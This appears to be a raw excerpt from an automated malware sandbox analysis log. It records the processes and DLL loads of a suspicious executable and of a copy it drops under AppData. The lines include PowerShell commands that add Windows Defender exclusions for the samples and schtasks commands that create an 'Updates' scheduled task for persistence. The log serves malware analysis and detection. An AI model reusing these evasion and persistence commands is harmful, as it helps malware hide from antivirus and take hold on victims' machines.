                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: fwpuclnt.dll
